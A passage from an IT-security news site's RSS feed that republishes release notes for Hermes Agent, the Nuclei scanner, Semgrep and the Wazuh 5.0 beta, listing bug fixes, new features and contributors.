<li>Fix: ACP PromptResponse usage from top-level fields (<a href="https://github.com/NousResearch/hermes-agent/pull/7086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7086/hovercard">#7086</a>)</li>
<li>Fix: several failing/flaky tests on main — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dsocolobsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dsocolobsky">@dsocolobsky</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6777" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6777/hovercard">#6777</a>)</li>
<li>Fix: backup marker filenames — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/8600" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8600/hovercard">#8600</a>)</li>
<li>Fix: <code>NoneType</code> in fast_mode check — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7350/hovercard">#7350</a>)</li>
<li>Fix: missing imports in uninstall.py — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JiayuuWang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JiayuuWang">@JiayuuWang</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7034" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7034/hovercard">#7034</a>)</li>
</ul>
<hr>
<h2>📚 Documentation</h2>
<ul>
<li>Platform adapter developer guide + WeCom Callback docs (<a href="https://github.com/NousResearch/hermes-agent/pull/7969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7969/hovercard">#7969</a>)</li>
<li>Cron troubleshooting guide (<a href="https://github.com/NousResearch/hermes-agent/pull/7122" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7122/hovercard">#7122</a>)</li>
<li>Streaming timeout auto-detection for local LLMs (<a href="https://github.com/NousResearch/hermes-agent/pull/6990" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6990/hovercard">#6990</a>)</li>
<li>Tool-use enforcement documentation expanded (<a href="https://github.com/NousResearch/hermes-agent/pull/7984" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7984/hovercard">#7984</a>)</li>
<li>BlueBubbles pairing instructions (<a href="https://github.com/NousResearch/hermes-agent/pull/6548" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6548/hovercard">#6548</a>)</li>
<li>Telegram proxy support section (<a href="https://github.com/NousResearch/hermes-agent/pull/6348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6348/hovercard">#6348</a>)</li>
<li><code>hermes dump</code> and <code>hermes logs</code> CLI reference (<a href="https://github.com/NousResearch/hermes-agent/pull/6552" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6552/hovercard">#6552</a>)</li>
<li><code>tool_progress_overrides</code> configuration reference (<a href="https://github.com/NousResearch/hermes-agent/pull/6364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6364/hovercard">#6364</a>)</li>
<li>Compression model context length warning docs (<a href="https://github.com/NousResearch/hermes-agent/pull/7879" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7879/hovercard">#7879</a>)</li>
</ul>
<hr>
<h2>👥 Contributors</h2>
<p><strong>269 merged PRs</strong> from <strong>24 contributors</strong> across <strong>487 commits</strong>.</p>
<h3>Community Contributors</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a></strong> (6 PRs) — Nix container-aware CLI, shared-state permissions, Matrix SQLite crypto store, bulk SSH/Modal file sync, Matrix mautrix compat</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a></strong> (2 PRs) — Creative divergence strategies skill, creative ideation skill</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a></strong> (2 PRs) — Error classifier disambiguation, backup marker fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nicoloboschi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nicoloboschi">@nicoloboschi</a></strong> — Hindsight memory plugin feature parity</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hygaard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hygaard">@Hygaard</a></strong> — Session-scoped gateway model override fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-phw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-phw">@jarvis-phw</a></strong> — Discord allowed_channels whitelist</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kathie-yu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kathie-yu">@Kathie-yu</a></strong> — Honcho initOnSessionStart for tools mode</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hermes-agent-dhabibi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hermes-agent-dhabibi">@hermes-agent-dhabibi</a></strong> — Discord forum channel topic inheritance</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kira-ariaki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kira-ariaki">@kira-ariaki</a></strong> — Discord .log attachments and size limit</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cherifya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cherifya">@cherifya</a></strong> — Codex fallback auth-store lookup</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cafexss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cafexss">@Cafexss</a></strong> — Security: auth for session continuation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KUSH42/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KUSH42">@KUSH42</a></strong> — Compaction context_length fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kuishou68/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kuishou68">@kuishou68</a></strong> — Auth error retryable classification fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a></strong> — ACP session capabilities</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ygd58/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ygd58">@ygd58</a></strong> — HERMES_HOME_MODE env var override</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a></strong> — Fast mode NoneType fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JiayuuWang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JiayuuWang">@JiayuuWang</a></strong> — CLI uninstall import fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HiddenPuppy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HiddenPuppy">@HiddenPuppy</a></strong> — Docker procps installation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dsocolobsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dsocolobsky">@dsocolobsky</a></strong> — Test suite fixes</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a></strong> — Docker image tag simplification</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sosyz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sosyz">@sosyz</a></strong> — Shallow git clone for faster install</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/devorun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/devorun">@devorun</a></strong> — Nix setupSecrets optional</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a></strong> — Nix tirith runtime dep</li>
</ul>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.4.8...v2026.4.13">v2026.4.8...v2026.4.13</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.7.0]]></title>
<description><![CDATA[What's Changed
🎉 New Features

Added cdp-endpoint option to allow users to specify a WebSocket endpoint for control in headless mode by @dwisiswant0 in #5786
Added RSYNC module by @Mzack9999 in #6410

🐞 Bug Fixes

Fixed resume file path condition by @dogancanbakir in #6784
Fixed race condition re...]]></description>
<link>https://tsecurity.de/de/3487848/it-security-tools/v370/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487848/it-security-tools/v370/</guid>
<pubDate>Tue, 05 May 2026 02:19:54 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<h3>🎉 New Features</h3>
<ul>
<li>Added <code>cdp-endpoint</code> option to allow users to specify a WebSocket endpoint for control in headless mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2624080660" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/5786" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/5786/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/5786">#5786</a></li>
<li>Added RSYNC module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339928922" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6410" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6410/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6410">#6410</a></li>
</ul>
<h3>🐞 Bug Fixes</h3>
<ul>
<li>Fixed resume file path condition by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3838262512" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6784" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6784/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6784">#6784</a></li>
<li>Fixed race condition regression by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3778140227" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6748" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6748/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6748">#6748</a></li>
<li>Fixed duplicate log spam for permanent errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3727604722" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6697" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6697/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6697">#6697</a></li>
<li>Fixed <code>ExecutionId</code> initialization in <code>DefaultOptions</code> function by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3608161049" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6598" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6598/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6598">#6598</a></li>
<li>Fixed handling full URLs in unsafe raw requests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3591704524" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6589" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6589/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6589">#6589</a></li>
<li>Fixed segfault in workflow parsing with global-matchers templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3828548511" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6774" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6774/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6774">#6774</a></li>
<li>Fixed logging update summary table to stderr by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayuxsec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayuxsec">@ayuxsec</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3816888652" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6769" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6769/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6769">#6769</a></li>
<li>Fixed sanitizing host when target has host port by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knakul853/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knakul853">@knakul853</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3790124844" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6759" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6759/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6759">#6759</a></li>
<li>Fixed interactsh matching with <code>payloads</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3832269830" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6778" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6778/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6778">#6778</a></li>
<li>Fixed passing template variables to TCP inputs pre-compilation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3829085975" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6776" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6776/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6776">#6776</a></li>
</ul>
<h3>Other Changes</h3>
<ul>
<li>Replaced seh-msft/burpxml with utils package by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3804099663" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6763" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6763/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6763">#6763</a></li>
<li>Removed genproto replace directives from go.mod by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ehsandeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ehsandeep">@ehsandeep</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626623960" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6608" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6608/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6608">#6608</a></li>
<li>Improved telnet login and added crypto by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346298463" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6419" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6419/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6419">#6419</a></li>
<li>Added Turkish README and enhanced CONTRIBUTING.md by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bahattinyunus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bahattinyunus">@bahattinyunus</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765639442" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6740" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6740/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6740">#6740</a></li>
<li>Refactored WithNetworkConfig and WithInteractshOptions to be used by NewThreadSafeNucleiEngineCtx by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/meme-lord/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/meme-lord">@meme-lord</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2778002512" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/5972/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/5972">#5972</a></li>
<li>Improved cache template signature verification performance by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3837100094" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6779" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6779/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6779">#6779</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bahattinyunus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bahattinyunus">@bahattinyunus</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3765639442" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6740" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6740/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6740">#6740</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/promalert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/promalert">@promalert</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3787486620" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6756" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6756/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6756">#6756</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayuxsec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayuxsec">@ayuxsec</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3816888652" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6769" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6769/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6769">#6769</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/projectdiscovery/nuclei/compare/v3.6.2...v3.7.0"><tt>v3.6.2...v3.7.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v1.155.0]]></title>
<description><![CDATA[1.155.0 - 2026-03-11
### Added

Added support for (agentic) hooks in Windsurf. (windsurf-hooks)
scala: Improved support for Scala 3's optional braces. (LANG-218)
Added PowerShell language support (beta) with parsing and pattern matching (lang-233)

### Changed


Removed the experimental and undoc...]]></description>
<link>https://tsecurity.de/de/3487836/it-security-tools/release-v11550/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487836/it-security-tools/release-v11550/</guid>
<pubDate>Tue, 05 May 2026 02:19:38 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/semgrep/semgrep/releases/tag/v1.155.0">1.155.0</a> - 2026-03-11</h2>
<h3>### Added</h3>
<ul>
<li>Added support for (agentic) hooks in Windsurf. (windsurf-hooks)</li>
<li>scala: Improved support for Scala 3's optional braces. (LANG-218)</li>
<li>Added PowerShell language support (beta) with parsing and pattern matching (lang-233)</li>
</ul>
<h3>### Changed</h3>
<ul>
<li>
<p>Removed the experimental and undocumented command <code>semgrep install-ci</code>. (osemgrep-install-ci)</p>
</li>
<li>
<p>Migrate from publishing a single Linux wheel with the platform tag <code>musllinux_1_0_&lt;arch&gt;.manylinux2014_&lt;arch&gt;</code> to publishing two separate wheels:</p>
<ul>
<li>A wheel with the platform tag musllinux_1_0_</li>
<li>A wheel with the platform tag manylinux2014_</li>
</ul>
<p>(pypi-linux-tag)</p>
</li>
</ul>
<h3>### Fixed</h3>
<ul>
<li>When performing parallel operations over a small number of input items, the<br>
engine no longer spawns more OCaml domains than we have items to process.  This<br>
assists with resource utilisation. (engine-2588)</li>
<li>Fixed: Prevent SessionStart hook crash when inject-secure-defaults receives empty stdin (JSONDecodeError). (engine-2592)</li>
<li>Semgrep secret validation now times out after 30 seconds instead of 15 minutes. Additionally this timeout is configurable via the <code>--secrets-timeout</code> flag. (engine-2593)</li>
<li>Fixed permission errors during lockfileless Java (Gradle) dependency resolution by invoking gradlew via sh when the executable bit is not set (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1308977430" data-permission-text="Title is private" data-url="https://github.com/semgrep/semgrep/issues/5747" data-hovercard-type="pull_request" data-hovercard-url="/semgrep/semgrep/pull/5747/hovercard" href="https://github.com/semgrep/semgrep/pull/5747">gh-5747</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0-beta1]]></title>
<description><![CDATA[Manager
Added

Added cluster-by-default deployment model: all Wazuh Server installations now run as a cluster node, removing the distinction between clustered and non-clustered deployments. The cluster.disabled configuration option has been removed. (#31295)
Added stateless metadata enrichment in...]]></description>
<link>https://tsecurity.de/de/3487824/it-security-tools/wazuh-v500-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487824/it-security-tools/wazuh-v500-beta1/</guid>
<pubDate>Tue, 05 May 2026 02:19:21 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Added</h3>
<ul>
<li>Added cluster-by-default deployment model: all Wazuh Server installations now run as a cluster node, removing the distinction between clustered and non-clustered deployments. The <code>cluster.disabled</code> configuration option has been removed. (<a href="https://github.com/wazuh/wazuh/issues/31295" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31295/hovercard">#31295</a>)</li>
<li>Added stateless metadata enrichment in <code>remoted</code>, centralizing event metadata handling for stateless messages and removing the dependency on <code>wazuh-db</code> for that ingestion path. (<a href="https://github.com/wazuh/wazuh/issues/33269" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33269/hovercard">#33269</a>)</li>
<li>Added Engine enrichment support: IOC matching, GeoIP lookup, and event filters. (<a href="https://github.com/wazuh/wazuh/issues/33493" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33493/hovercard">#33493</a>)</li>
<li>Added Engine adaptation tier 2: raw archives handling, uncategorized event routing, input-level throttling, and internal metrics exposure. (<a href="https://github.com/wazuh/wazuh/issues/34477" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34477/hovercard">#34477</a>)</li>
<li>Added Wazuh Instance Registration status to reflect CTI <code>access_token</code> availability (<code>Pending</code>, <code>Polling</code>, <code>Denied</code>, <code>Available</code>), allowing the Dashboard to query the subscription state. (<a href="https://github.com/wazuh/wazuh/pull/31906" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31906/hovercard">#31906</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Upgraded embedded Python interpreter from 3.10 to 3.12. (<a href="https://github.com/wazuh/wazuh/issues/33377" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33377/hovercard">#33377</a>) (<a href="https://github.com/wazuh/wazuh/issues/33570" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33570/hovercard">#33570</a>)</li>
<li>Adapted Vulnerability Detector input pipeline to the new Wazuh 5.0 synchronization algorithm, covering first-scan, inventory-change, and feed-update scenarios. (<a href="https://github.com/wazuh/wazuh/issues/30535" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30535/hovercard">#30535</a>)</li>
<li>Revamped Role-Based Access Control (RBAC) management and introduced an upgrade mechanism for existing RBAC configurations. (<a href="https://github.com/wazuh/wazuh/issues/27706" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/27706/hovercard">#27706</a>)</li>
<li>Removed legacy configuration surfaces, database schemas, build targets, and compatibility layers in the second server cleanup phase. (<a href="https://github.com/wazuh/wazuh/issues/34608" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34608/hovercard">#34608</a>)</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed Filebeat as the log-shipping component; event forwarding now uses native Wazuh server connectivity to the Wazuh Indexer via <code>indexer-connector</code>. (<a href="https://github.com/wazuh/wazuh/pull/33124" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33124/hovercard">#33124</a>)</li>
